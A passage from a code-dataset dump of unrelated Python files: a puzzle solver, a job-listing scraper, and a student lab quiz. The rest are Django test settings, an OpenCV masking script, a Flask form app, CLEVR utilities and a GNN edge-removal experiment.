cubesPerRow):\n\t\tfor z in range(0, cubesize):\n\t\t\tfor k in range(0, cubesPerRow):\n\t\t\t\treturnCube = returnCube + cubes[i+k][(z*cubesize):(z*cubesize+cubesize)]\n\n\treturn returnCube\n\ndef printCube(cube):\n\tl = len(cube)\n\tsideLength = int(math.sqrt(l))\n\tfor i in range(sideLength):\n\t\tprint( \"\".join(cube[i*sideLength: i*sideLength+sideLength]))\n\tprint()\n\n\ncube = list('.#...####')\n\nfor i in range(0,18):\n\tl = len(cube)\n\tif l % 2 == 0:\n\t\tcube = list(map(lambda x: recode(x), getSubCubes(cube,2)))\n\t\t#print(cube)\n\t\tcube = combineSubCubes(cube)\n\t\t#printCube(cube)\n\telse:\n\t\tcube = list(map(lambda x: recode(x), getSubCubes(cube,3)))\n\t\t#print(cube)\n\t\tcube = combineSubCubes(cube)\n\t\t#printCube(cube)\n\t\n\tprint(i,len(list(filter(lambda x: x=='#', cube))))\n","sub_path":"day21/day21.py","file_name":"day21.py","file_ext":"py","file_size_in_byte":2799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"131323911","text":"# -*- coding: utf-8 -*-\n\"\"\"\n This spider is a AutoHireJobs spider created on top of the ATSSpider\n scrapy crawl autohirejobs -a mining_job_id=9999 -a iteration=1 -a extract=1 -a url=\"http://autohire.careershop.com/ardentmillsexternal/JobSearch/JobSearchList.asp\"\n\n sample seed urls:\n http://autohire.careershop.com/midwayslots/JobSearch/JobSearchList.asp\n http://autohire.careershop.com/septajobs/JobSearch/JobSearchList.asp\n 
http://autohire.careershop.com/kdmc/JobSearch/JobSearchList.asp\n http://autohire.careershop.com/cree/JobSearch/JobSearchList.asp?\n http://autohire.careershop.com/cree_europe/JobSearch/JobSearchList.asp?\n\n sample job url:\n http://autohire.careershop.com/ardentmillsexternal/JobSearch/JobCenterViewCndt.asp?JobAd_Id=956771\n\"\"\"\n\nfrom re import compile\nfrom scrapy.http import Request\nfrom scrapy.http import FormRequest\nfrom scrapy.selector import Selector\nfrom urlparse import urljoin\n\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import Prefix, RemoveBadElements, NormalizedJoin\n\nNext_Page = compile(r\"nextPage\\((\\d+)\\)\")\n\n\nclass AutoHireJobs(ATSSpider):\n\n name = \"autohirejobs\"\n\n def parse(self, response):\n selector = Selector(response)\n jobs = selector.xpath('//table[@id=\"Table3\"]//tr')\n for job in jobs:\n url = job.xpath('./td//a[@class=\"joblistText\"]/@href').extract()\n if url:\n yield Request(\n callback=self.parse_job_callback(),\n meta={\n 'date': job.xpath('./td[4]//text()').extract(),\n 'location': job.xpath('./td[3]//text()').extract(),\n 'ref_num': job.xpath('./td[1]/span/text()').extract(),\n },\n url=urljoin(response.url, url[0])\n )\n\n next_page = Next_Page.search(''.join(selector.xpath('//a[contains(text(), \"%s\")]/@href' % unicode('»', 'utf-8')).extract()))\n if next_page:\n yield FormRequest(\n callback=self.parse,\n formdata={\n 'Page': next_page.group(1),\n 'SortOrder': '',\n 'AscDesc': '',\n 'PrevSortOrder': ''\n },\n url=response.url\n )\n\n def parse_job(self, response):\n selector = Selector(response)\n loader = BrightcorpItemLoader(selector=selector)\n\n loader.add_xpath(\n 'description',\n '//tr//*[contains(text(), \"Job Description\")]/../../following-sibling::tr',\n RemoveBadElements(['a'])\n )\n loader.add_xpath(\n 'educationrequirements',\n '//*[contains(text(), \"Degree Required\")]/../following-sibling::td//text()'\n )\n loader.add_xpath(\n 'experiencerequirements',\n '//*[contains(text(), \"Years of Work Experience\")]/../following-sibling::td//text()'\n )\n\n loader.add_xpath(\n 'jobtype',\n [\n '//*[contains(text(), \"Position Type\")]/../following-sibling::td//text()',\n '//*[contains(text(), \"Type of Assignment\")]/../following-sibling::td//text()',\n ],\n NormalizedJoin(\", \")\n )\n loader.add_xpath('jobcategory', '//*[contains(text(), \"Category\")]/../following-sibling::td//text()')\n loader.add_xpath('title', '//*[contains(text(), \"Job Title\")]/../following-sibling::td//text()')\n loader.add_xpath('zip_code', '//*[contains(text(), \"Postal Code\")]/../following-sibling::td//text()')\n\n loader.add_value('apply_url', response.url)\n loader.add_value('date', response.meta.get('date'))\n loader.add_value('location', response.meta.get('location'))\n loader.add_value('referencenumber', response.meta.get('ref_num'), Prefix('%s-' % self.name))\n loader.add_value('url', response.url)\n\n yield loader.load_item()\n","sub_path":"brightcorp/brightcorp/spiders/autohirejobs.py","file_name":"autohirejobs.py","file_ext":"py","file_size_in_byte":4055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"294566904","text":"# Tyler Bade\n# February 4\n# Lab quiz 1\n\n# String prompt\nuserInput = input(\"Please enter a string: \")\nuserStr = str(userInput)\n\n# Empty string case\nif userStr == \"\":\n print(\"Empty string\")\n\n# Second character\nelif len(userStr) % 2 == 0:\n second = userStr[1]\n 
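# For example (illustrative input, not part of the original quiz): with the\r\n    # even-length string \"abba\", userStr[1] is \"b\" and \"abba\".endswith(\"a\")\r\n    # is True, so this branch prints both the second character and \"Bookends\".\r\n    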
print(\"The second character is \", second)\n if userStr.endswith(userStr[0]):\n print(\"Bookends\")\n\n# Middle character\nelse:\n mid = len(userStr) // 2\n if userStr[mid].isdigit():\n print(\"The middle character is a digit\")\n\n# End\nprint(\"Done\")\n","sub_path":"IT 210 - Fundamentals of Programming/Labs/LabQuiz1.py","file_name":"LabQuiz1.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"186489256","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\ntest_site settings\n\"\"\"\n\nimport os\n\nPROJECT_ROOT = os.path.dirname(os.path.abspath(__file__))\n\n# django settings\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(PROJECT_ROOT, 'test.sqlite'),\n 'USER': '',\n 'PASSWORD': '',\n 'HOST': '',\n 'PORT': '',\n }\n}\n\nDEBUG = True\n\nINSTALLED_APPS = [\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.admin',\n 'django.contrib.staticfiles',\n 'django.contrib.sites',\n 'south',\n 'kombu.transport.django',\n 'djcelery',\n 'rsstwitter'\n]\n\nINTERNAL_IPS = ('127.0.0.1',)\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': True,\n 'formatters': {\n 'simple': {\n 'format': \"%(levelname)-8s \"\n \"%(name)s:%(funcName)s:%(lineno)d %(message)s\"\n },\n },\n 'handlers': {\n 'console': {\n 'level':'NOTSET',\n 'class':'logging.StreamHandler',\n 'formatter': 'simple'\n }\n },\n 'loggers': {\n 'django': {\n 'level': 'DEBUG',\n 'propagate': True,\n 'handlers': ('console',)\n }\n },\n 'root': {\n 'level': 'DEBUG',\n 'propagate': True,\n 'handlers': ('console',)\n }\n}\n\nMEDIA_ROOT = os.path.join(PROJECT_ROOT, 'media')\nMEDIA_URL = '/media/'\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware'\n)\n\nROOT_URLCONF = 'test_site.urls'\n\nSITE_ID = 1\n\nSTATIC_ROOT = os.path.join(PROJECT_ROOT, 'static')\nSTATIC_URL = '/static/'\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n \"django.contrib.auth.context_processors.auth\",\n \"django.core.context_processors.debug\",\n \"django.core.context_processors.media\",\n \"django.core.context_processors.static\",\n \"django.contrib.messages.context_processors.messages\"\n)\n\nTIME_ZONE = 'UTC'\nDATE_FORMAT = 'Y-m-d'\nDATETIME_FORMAT = 'Y-m-d H:i'\n\n# celery\n\nCELERYBEAT_LOG_LEVEL = 'DEBUG'\nCELERYD_LOG_LEVEL = CELERYBEAT_LOG_LEVEL\nCELERYD_CONCURRENCY = 1\nBROKER_URL = \"django://\"\nCELERYBEAT_SCHEDULER = \"djcelery.schedulers.DatabaseScheduler\"\n\nfrom datetime import timedelta\nimport djcelery\n\nCELERYBEAT_SCHEDULE = {\n 'runs-every-hour': {\n 'task': 'rsstwitter.tasks.refresh',\n 'schedule': timedelta(seconds=3600)\n }\n}\n\ndjcelery.setup_loader()\n","sub_path":"test_site/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"221834569","text":"import numpy as np\nimport cv2 \nfrom matplotlib import pyplot as plt\nfrom matplotlib import colors\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import cm\n\n\ndarkorg = cv2.cvtColor(cv2.imread('dark.jpg'), cv2.COLOR_RGB2BGR)\ndark = darkorg\nhsv_dark = cv2.cvtColor(dark, 
cv2.COLOR_BGR2HSV)\n\nplt.subplot(1,2,1)\nplt.imshow(darkorg)\nplt.title('Original Image')\nplt.xticks([])\nplt.yticks([])\n\n# h, s, v = cv2.split(hsv_dark)\n# fig = plt.figure() \n# axis = fig.add_subplot(1, 1, 1, projection=\"3d\")\n\n# pixel_colors = dark.reshape((np.shape(dark)[0]*np.shape(dark)[1], 3))\n# norm = colors.Normalize(vmin=-1.,vmax=1.)\n# norm.autoscale(pixel_colors)\n# pixel_colors = norm(pixel_colors).tolist()\n\n\n# axis.scatter(h.flatten(), s.flatten(), v.flatten(), facecolors=pixel_colors, marker=\".\")\n# axis.set_xlabel(\"Hue\")\n# axis.set_ylabel(\"Saturation\")\n# axis.set_zlabel(\"Value\")\n# plt.show()\n\nreddown = (115, 0, 0)\nredup = (150, 255, 255)\n\nmask = cv2.inRange(hsv_dark, reddown, redup)\nresult = cv2.bitwise_and(dark, dark, mask=mask)\n\ndark -= result\n\nresult = cv2.cvtColor(result, cv2.COLOR_RGB2BGR)\ndark +=result\n\nplt.subplot(1,2,2)\nplt.imshow(dark)\nplt.title('Modified Image')\nplt.xticks([])\nplt.yticks([])\n\n\n\nplt.show()\ncv2.destroyAllWindows()\n","sub_path":"OpenCV/q13.py","file_name":"q13.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"89819173","text":"from flask import Flask, request, redirect, session, flash, render_template\n\n\napp = Flask(__name__)\napp.secret_key = \"unicorns\"\n\n\n@app.route('/')\ndef index():\n if \"info\" not in session:\n session['info'] = \"\"\n return render_template(\"index.html\")\n\n\n@app.route(\"/form\", methods=[\"GET\", \"POST\"])\ndef form():\n if len(request.form['FirstName']) < 1 or len(request.form['LastName']) < 1:\n flash(\"Please Complete Form\")\n else:\n session['info'] = [request.form[\"FirstName\"], request.form['LastName'],\n request.form['FaveSnack']]\n\n return redirect('/')\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"553804662","text":"import json\nimport os\nimport pickle\nimport re\nimport math\n\nimport nltk\nimport torch\nfrom tqdm import tqdm\nimport shutil\nimport numpy as np\n\nclasses = {\n 'number':['0','1','2','3','4','5','6','7','8','9','10'],\n 'material':['rubber','metal'],\n 'color':['cyan','blue','yellow','purple','red','green','gray','brown'],\n 'shape':['sphere','cube','cylinder'],\n 'size':['large','small'],\n 'exist':['yes','no']\n }\n\ndef tokenize(sentence):\n # punctuation should be separated from the words\n s = re.sub('([.,;:!?()])', r' \\1 ', sentence)\n s = re.sub('\\s{2,}', ' ', s)\n\n # tokenize\n split = s.split()\n\n # normalize all words to lowercase\n lower = [w.lower() for w in split]\n return lower\n\ndef build_dictionaries(clevr_dir):\n\n def compute_class(answer):\n for name,values in classes.items():\n if answer in values:\n return name\n \n raise ValueError('Answer {} does not belong to a known class'.format(answer))\n \n cached_dictionaries_orig = os.path.join(clevr_dir, 'questions', 'CLEVR_built_dictionaries.pkl')\n cached_dictionaries = os.path.join(clevr_dir, 'CLEVR-Humans', 'CLEVR_built_dictionaries.pkl')\n\n if os.path.exists(cached_dictionaries):\n print('==> using cached dictionaries: {}'.format(cached_dictionaries))\n with open(cached_dictionaries, 'rb') as f:\n return pickle.load(f)\n \n with open(cached_dictionaries_orig, 'rb') as f:\n quest_to_ix, answ_to_ix, answ_ix_to_class = pickle.load(f)\n\n # quest_to_ix = {}\n # answ_to_ix = 
{}\n    # answ_ix_to_class = {}\n    json_train_filename = os.path.join(clevr_dir, 'CLEVR-Humans', 'CLEVR-Humans-train.json')\n    #load all words from all training data\n    from collections import Counter  # Counter is used below for the word counts\n    counter = Counter()\n\n    with open(json_train_filename, \"r\") as f:\n        questions = json.load(f)['questions']\n        for q in tqdm(questions):\n            question_tokens = nltk.tokenize.word_tokenize(q['question'])\n            answer = q['answer']\n            #pdb.set_trace()\n            counter.update(question_tokens)\n        '''\n        for word in question:\n            if word not in quest_to_ix:\n                quest_to_ix[word] = len(quest_to_ix)+1 #one based indexing; zero is reserved for padding\n        '''\n    threshold = 4\n    words = [word for word, cnt in counter.items() if cnt >= threshold and word not in quest_to_ix]\n\n    i = max(quest_to_ix.values())+1\n\n    for w in words:\n        quest_to_ix[w] = i\n        i += 1\n\n    ret = (quest_to_ix, answ_to_ix, answ_ix_to_class) \n    with open(cached_dictionaries, 'wb') as f:\n        pickle.dump(ret, f)\n\n    return ret\n\n\ndef to_dictionary_indexes(dictionary, sentence):\n    \"\"\"\n    Outputs indexes of the dictionary corresponding to the words in the sequence.\n    Case insensitive.\n    \"\"\"\n    split = nltk.tokenize.word_tokenize(sentence)\n    idxs = torch.LongTensor([dictionary[w] if w in dictionary else 0 for w in split])\n    return idxs\n\ndef collate_data(batch):\n    images, lengths = [], []\n    batch_size = len(batch)\n\n    max_len = max(map(lambda x: len(x[1]), batch))\n\n    questions = np.zeros((batch_size, max_len), dtype=np.int64)\n    sort_by_len = sorted(batch, key=lambda x: len(x[1]), reverse=True)\n\n    for i, b in enumerate(sort_by_len):\n        image, question, length = b\n        images.append(torch.from_numpy(image))\n        length = len(question)\n        questions[i, :length] = question\n        lengths.append(length)\n\n    return torch.stack(images), torch.from_numpy(questions), \\\n        lengths\n\ndef set_optimizer_lr(optimizer, lr):\n    # callback to set the learning rate in an optimizer, without rebuilding the whole optimizer\n    for param_group in optimizer.param_groups:\n        param_group['lr'] = lr\n    return optimizer\n    \ndef get_sgdr_lr(period, epoch_id, eta_min, eta_max):\n    '''\n    Tmax: period\n    Tcurr: batch_idx\n    '''\n\n    radians = math.pi*(epoch_id/period)\n    # cosine annealing: interpolate between eta_max (epoch 0) and eta_min (epoch == period)\n    return eta_min + 0.5 * (eta_max - eta_min) * (1.0 + math.cos(radians))\n\ndef get_positional_encoding(H, W):\n    pe_dim = 128\n    assert pe_dim % 4 == 0, 'pe_dim must be a multiple of 4 (h/w x sin/cos)'\n    c_period = 10000. 
** np.linspace(0., 1., pe_dim // 4)\n h_vec = np.tile(np.arange(0, H).reshape((H, 1, 1)), (1, W, 1)) / c_period\n w_vec = np.tile(np.arange(0, W).reshape((1, W, 1)), (H, 1, 1)) / c_period\n position_encoding = np.concatenate(\n (np.sin(h_vec), np.cos(h_vec), np.sin(w_vec), np.cos(w_vec)), axis=-1)\n position_encoding = np.transpose(position_encoding.reshape((H, W, pe_dim)), (2,0,1)).astype(np.float32)\n return position_encoding","sub_path":"LNMN_14/utils_test_clevr_humans.py","file_name":"utils_test_clevr_humans.py","file_ext":"py","file_size_in_byte":4678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"639835121","text":"from libraries import *\nfrom geo import Geo\nfrom load_functions import *\nfrom eval_functions import *\n\n\ndataset = 'geotext'\npath = \"C:\\\\Users\\\\61484\\\\Graph_Convolutional_Networks\\\\data\\\\geo\"\ndataset = Geo(path, dataset, transform=None)\ndata = dataset[0]\n\nA, X_train, Y_train, X_dev, Y_dev, X_test, Y_test, U_train, U_dev, U_test, classLatMedian, classLonMedian, userLocation, vocab = get_geo_data(dataset.raw_dir, 'dump.pkl')\n\nU = U_train + U_dev + U_test\nlocs = np.array([userLocation[u] for u in U])\n\nclass Net(torch.nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n self.lin1 = Sequential(Linear(dataset.num_features, 300))\n self.conv1 = GCNConv(300, dataset.num_classes)\n #self.conv2 = GCNConv(300, 300)\n #self.lin2 = Sequential(Linear(300, dataset.num_features))\n\n def forward(self, x, edge_index):\n x = F.relu(self.lin1(x))\n x = F.dropout(x, training=self.training)\n x = F.relu(self.conv1(x, edge_index))\n #x = self.conv2(x, edge_index)\n #x = self.lin2(x)\n return F.log_softmax(x, dim=1)\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nmodel = Net().to(device)\ndata = data.to(device)\nx, edge_index = data.x, data.edge_index\n\nmodel_path = osp.join(dataset.raw_dir, 'model.pth')\nprint(f\"model path:{model_path}\")\nif osp.exists(model_path):\n model.load_state_dict(torch.load(model_path))\n model.eval()\n\n#returns the non_zero edges based on the explained priority:\ndef priority_edges(edge_index,user):\n aa = np.where(np.array(edge_index[:, edge_mask.argsort()[:]][0])==user)\n bb = edge_index[:, edge_mask.argsort()[:]][:,aa]\n \n return bb[:,0]\n\n#index of the same element:\n#cat = explained edge_indexes\ndef self_connection_index(cat,aa):\n bb = cat[:, edge_mask.argsort()[:]]\n xx = bb[:,aa[0]]\n vv = np.array(xx)\n for i in range(len(vv[0])):\n if vv[0][i]==vv[1][i]:\n return i\n#deleting self indexes from the indexes to be removed:\ndef delete_self(aa,index):\n aa3 = np.delete(aa,index,1)\n return aa3\n\n#sorting the other connection index, based on the intial indexes(in the future,it would to easier to remove both edges at the same time)\ndef sort2edge(cat,aa3,aa4):\n bb = cat[:, edge_mask.argsort()[:]]\n ee = bb[:,aa3[0]]\n ff = bb[:,aa4[0]]\n ls = []\n for i in ff[0]:\n cnt = 0\n for j in ee[1]:\n if i==j:\n ls.append(cnt)\n cnt +=1\n r = np.arange(len(aa4[0]))\n np.put(r,ls,list(aa4[0]))\n return r\n\n#revering indexes:\ndef revere_indexes(r):\n return r[::-1]\n\ndef find_indx(ls1,ls2):\n ls= []\n for i in ls1:\n cnt=0\n for j in ls2:\n if i==j:\n ls.append(cnt)\n cnt+=1 \n return ls\n\n\nexplainer = GNNExplainer(model, epochs=200)\n\n#random removal of edges:\ntest_index = np.arange(len(U_train + U_dev), len(U_train + U_dev + U_test)).tolist()\nhav_distance = [] #distance between the true and predcited labels for each user\nlatlon_tr = 
[] #true latitutde and longitude of the users\nlatlon_pre = []# predicted latitude and longitude of the users\naccuracy = []\nnum_us = []\nuser_id = []\nuser_add = 0\n\nrand_edges = np.arange(211451)\n\nfor user in tqdm(test_index[0:100]):\n #explaining the node\n node_feat_mask, edge_mask = explainer.explain_node(user, x, edge_index)\n\n #priotizig the edges based on explaination\n prio_edge = priority_edges(edge_index,user) \n\n aa1 = np.where(np.array(edge_index[:, edge_mask.argsort()[:]][0])==user)\n aa2 = np.where(np.array(edge_index[:, edge_mask.argsort()[:]][1])==user)\n \n for num_users in [perc(prio_edge[0],0),perc(prio_edge[0],0.05),perc(prio_edge[0],0.10),perc(prio_edge[0],0.20),perc(prio_edge[0],0.40),perc(prio_edge[0],0.60),perc(prio_edge[0],0.80),perc(prio_edge[0],1)]:\n #------------------------------------------------------------\n Adj_mat = A.copy()\n Adj_mat.setdiag(1)\n Adj_mat[Adj_mat>0] = 1\n\n Adj_mat = Adj_mat.tocoo()\n \n cat = torch.tensor([Adj_mat.row, Adj_mat.col], dtype=torch.long)\n bb = cat[:, edge_mask.argsort()[:]]\n \n self_indx1,self_indx2 = self_connection_index(cat,aa1),self_connection_index(cat,aa2)\n conn1,conn2 = delete_self(aa1,self_indx1),delete_self(aa2,self_indx2)\n sorted_conn2 = sort2edge(cat,conn1,conn2)\n \n try:\n asd = sample(list(conn1[0]),num_users) #random sampling\n except ValueError:\n asd = sample(list(conn1[0]),num_users-1)\n qwe = find_indx(asd,conn1[0]) \n fgh = sorted_conn2[qwe] #indexes of the edges from the other side of the connection.\n \n edge_index_new = torch.tensor(np.delete(np.array(bb),np.append(asd,list(fgh)),1)) # removing the edges\n\n #using this features to predict the class:\n log_logists_new = model(x,edge_index_new)\n y_pred_test_new = torch.argmax(log_logists_new, dim=1)[np.arange(len(U_train + U_dev), len(U_train + U_dev + U_test))][user_add]\n distances, acc_at_161, latlon_true, latlon_pred = geo_eval_trail(Y_test[user_add], np.array(y_pred_test_new), U_test[user_add], classLatMedian, classLonMedian, userLocation)\n hav_distance.append(distances[0])\n latlon_tr.append(latlon_true[0])\n latlon_pre.append(latlon_pred[0])\n accuracy.append(acc_at_161)\n num_us.append(num_users)\n user_id.append(U_test[user_add])\n user_add += 1\n\ndf1 = pd.DataFrame(list(zip(user_id,num_us,latlon_tr,latlon_pre,hav_distance,accuracy)),columns =['user','num_users','latlon_tru','latlon_pred','haversine_distance',\"acc_at_161\"])\n\n\npercent = [0,5,10,20,40,60,80,100]\ndf1['percent'] = percent *100\n\nmean_pts = [np.mean(df1[df1['percent']==i]['haversine_distance']) for i in percent]\nmedian_pts = [np.median(df1[df1['percent']==i]['haversine_distance']) for i in percent]\n\nacc_pts = []\nfor i in percent:\n dist = list(df1[df1['percent']==i]['haversine_distance'])\n accuracy= len([d for d in dist if d < 161]) / float(len(dist))\n acc_pts.append(accuracy)\n\n\ndf1.to_csv('C:\\\\Users\\\\61484\\\\Graph_Convolutional_Networks\\\\saved_files\\\\remove_edges_random.csv',index=False)\n\nwith open(\"C:\\\\Users\\\\61484\\\\Graph_Convolutional_Networks\\\\saved_files\\\\mean_pts_edges_rm_random.txt\", \"wb\") as fp: \n pickle.dump(mean_pts, fp)\n\nwith open(\"C:\\\\Users\\\\61484\\\\Graph_Convolutional_Networks\\\\saved_files\\\\median_pts_edges_rm_random.txt\", \"wb\") as fp: \n pickle.dump(median_pts, fp)\n\nwith open(\"C:\\\\Users\\\\61484\\\\Graph_Convolutional_Networks\\\\saved_files\\\\acc_pts_edges_rm_random.txt\", \"wb\") as fp: \n pickle.dump(acc_pts, 
fp)","sub_path":"remove_edges_random.py","file_name":"remove_edges_random.py","file_ext":"py","file_size_in_byte":6634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"198685916","text":"from django.conf.urls import url, include\nfrom django.contrib import admin\nfrom django.conf import settings\n\nurlpatterns = []\n\nif settings.DJANGO_ADMIN_ENABLED:\n urlpatterns += [\n url(r'^admin/', admin.site.urls),\n ]\n\nurlpatterns += [\n url(r'', include('mf_game.urls')),\n]\n","sub_path":"mathfun/mathfun/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"141942594","text":"#!/bin/bash\n\n# Graph the cost of theta 1 and determine the best fit line\n\nplot = ((1,1),(2,2),(3,3))\n\nn = len(plot)\n\ndef h(x, theta1):\n return theta1*x\n\ndef J(theta1):\n sum = 0.0\n for i in range(n):\n sum+= (h(plot[i][0],theta1) - plot[i][1]) ** 2\n return (1.0/(2*n)) * sum\ncost = 1\n\nfor i in range(plot[len(plot)-1][0]):\n print(str(i) + \": \" + str(J(i)))\n","sub_path":"Ex1.py","file_name":"Ex1.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"461622479","text":"##########################################################################\n#\n# Courtesy of Felix Dangel: https://github.com/f-dangel/backpack\n#\n##########################################################################\n\n\n\"\"\"Exact computation of full Hessian using autodiff.\"\"\"\nfrom torch import cat, zeros, stack\nfrom torch.autograd import grad\nfrom tqdm import tqdm, trange\n\n\ndef exact_hessian(f, parameters, show_progress=False):\n r\"\"\"Compute all second derivatives of a scalar w.r.t. `parameters`.\n​\n The order of parameters corresponds to a one-dimensional\n vectorization followed by a concatenation of all tensors in\n `parameters`.\n​\n Parameters\n ----------\n f : scalar torch.Tensor\n Scalar PyTorch function/tensor.\n parameters : list or tuple or iterator of torch.Tensor\n Iterable object containing all tensors acting as variables of `f`.\n show_progress : bool\n Show a progressbar while performing the computation.\n​\n Returns\n -------\n torch.Tensor\n Hessian of `f` with respect to the concatenated version\n of all flattened quantities in `parameters`\n\n Note\n ----\n The parameters in the list are all flattened and concatenated\n into one large vector `theta`. Return the matrix :math:`d^2 E /\n d \\theta^2` with\n\n .. 
math::\n​\n (d^2E / d \\theta^2)[i, j] = (d^2E / d \\theta[i] d \\theta[j]).\n​\n The code is a modified version of\n https://discuss.pytorch.org/t/compute-the-hessian-matrix-of-a-\n network/15270/3\n \"\"\"\n params = list(parameters)\n if not all(p.requires_grad for p in params):\n raise ValueError(\"All parameters have to require_grad\")\n df = grad(f, params, create_graph=True)\n # flatten all parameter gradients and concatenate into a vector\n dtheta = None\n for grad_f in df:\n dtheta = (\n grad_f.contiguous().view(-1)\n if dtheta is None\n else cat([dtheta, grad_f.contiguous().view(-1)])\n )\n # compute second derivatives\n hessian_dim = dtheta.size(0)\n hessian = zeros(hessian_dim, hessian_dim)\n progressbar = tqdm(\n iterable=range(hessian_dim),\n total=hessian_dim,\n desc=\"[exact] Full Hessian\",\n disable=(not show_progress),\n )\n for idx in progressbar:\n df2 = grad(dtheta[idx], params, create_graph=True)\n d2theta = None\n for d2 in df2:\n d2theta = (\n d2.contiguous().view(-1)\n if d2theta is None\n else cat([d2theta, d2.contiguous().view(-1)])\n )\n hessian[idx] = d2theta\n return hessian\n\n\ndef exact_hessian_diagonal_blocks(f, parameters, show_progress=True):\n \"\"\"Compute diagonal blocks of a scalar function's Hessian.\n​\n Parameters\n ----------\n f : scalar of torch.Tensor\n Scalar PyTorch function\n parameters : list or tuple or iterator of torch.Tensor\n List of parameters whose second derivatives are to be computed\n in a blockwise manner\n show_progress : bool, optional\n Show a progressbar while performing the computation.\n​\n Returns\n -------\n list of torch.Tensor\n Hessian blocks. The order is identical to the order specified\n by `parameters`\n​\n Note\n ----\n For each parameter, `exact_hessian` is called.\n \"\"\"\n return [exact_hessian(f, [p], show_progress=show_progress)\n for p in parameters]\n","sub_path":"hessian.py","file_name":"hessian.py","file_ext":"py","file_size_in_byte":3376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"547223560","text":"class Solution:\n def findJudge(self, N, trusts):\n tracker = [N] * N\n for trust in trusts:\n a, b = trust\n tracker[a - 1] = -1\n if tracker[b - 1] != -1:\n tracker[b - 1] -= 1\n print(tracker)\n judges = [i for i, item in enumerate(tracker) if item == 1]\n return judges[0] + 1 if len(judges) == 1 else -1\n\n\ns = Solution()\nN = 4\ntrusts = [[1, 3], [1, 4], [2, 3], [2, 4], [4, 3]]\nprint(s.findJudge(N, trusts))\n","sub_path":"Python_Projects/6-Google codejam/171_find_the_town_judge.py","file_name":"171_find_the_town_judge.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"552350814","text":"\nimport csv\nimport numpy as np\nimport pandas as pd\nimport datetime as dt\n\nwith open('Sykt_t_data_2019.csv', encoding='cp1251') as csvfile:\n spamreader = csv.reader(csvfile)\n fields_name = spamreader.__next__()[1:]\n\nfields = [*fields_name[1:5],*fields_name[10:11],*fields_name[28:30],*fields_name[31:33],*fields_name[34:35],*fields_name[37:39],*fields_name[41:42],*fields_name[43:44]]\nprint(repr(fields))\n\ndb = pd.read_csv('Sykt_t_data_2019.csv', encoding='cp1251')\ndb = db[fields]\nprint(db.loc[0])\ndb['date'] = db.apply(lambda row: str(int(row[fields[0]])) + ':' + str(int(row[fields[1]]))+ ':' + str(int(row[fields[2]])) + ':' + str(int(row[fields[3]])) + \":00:00\", axis=1) #+'-'+db[fields_name[6]].str\ndb['date'] = pd.to_datetime(db['date'], 
format='%Y:%m:%d:%H:%M:%S')\n#db['date'] = db['date'] + dt.timedelta(hours=3)\ndb['date'] = db['date'] + dt.timedelta(hours=3)\n\ndb = db.set_index(pd.DatetimeIndex(db['date']))\ndb = db[['Сумма осадков', 'Температура поверхности почвы', 'Мин. температура пов-сти почвы между сроками', 'Макс. температура пов-сти почвы между сроками', 'Температура воздуха по сухому терм-ру', 'Мин.температура воздуха между сроками', 'Макс. темперура воздуха между сроками', 'Относительная влажность воздуха']]\n# print(db.loc['2018-09-02 15:00:00']['Температура воздуха по сухому терм-ру'])\n# print(db.loc['2018-09-02 18:00:00']['Температура воздуха по сухому терм-ру'])\n# print(db.loc['2018-09-02 21:00:00']['Температура воздуха по сухому терм-ру'])\ndb.to_csv('Sykt_t_data_cleaned_2019.csv', encoding='cp1251')\n\n","sub_path":"t_data_cleaning2019.py","file_name":"t_data_cleaning2019.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"340802349","text":"# standard imports\nfrom typing import Iterator\nfrom argparse import ArgumentParser, Namespace\n\n# toolbox imports\nfrom .config import config\n\n\ndef prepare(parser: ArgumentParser) -> None:\n \"\"\"Add arguments to an :py:class:`ArgumentParser`, that\n allow to specify general options for the Deep Learning ToolBox.\n\n Parameters\n ----------\n parser: ArgumentParser\n The argument parser to which arguments are to be added.\n \"\"\"\n 